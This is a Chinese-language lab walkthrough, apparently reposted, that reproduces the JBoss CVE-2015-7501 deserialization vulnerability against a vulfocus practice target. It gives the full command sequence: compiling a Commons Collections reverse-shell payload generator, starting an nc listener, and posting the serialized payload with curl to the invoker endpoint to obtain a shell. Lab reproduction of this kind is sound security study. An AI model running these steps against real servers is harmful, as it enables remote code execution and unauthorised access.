jboss CVE-2015-7501 反序列化漏洞复现


JBOSS反序列化漏洞
环境: vulfocus jboss CVE-2015-7501
云服务器
kali攻击机
基本原理:JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码
访问网站页面 invoker/JMXInvokerServlet 页面如果出现这个页面,则证明存在漏洞
0

 

 

下载完成后在kali上解压
进入到文件夹目录
这里kali没有带javac命令,需要自己下载相关配置
0
使用命令安装jdk
apt install default-jdk
然后执行命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
执行完成后再执行另一条命令
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port
完成后生成一个ReverseShellCommonsCollectionsHashMap.ser文件,注意这里的ip和端口就是反弹到服务器的ip和监听的端口
0
然后在服务器上使用nc开启监听
nc -lvnp port
0
这里服务器的ip和监听的的端口就是上文的ip和端口
然后在kali执行命令进行反弹shell
curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
0
查看服务器,反弹shell成功
0


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM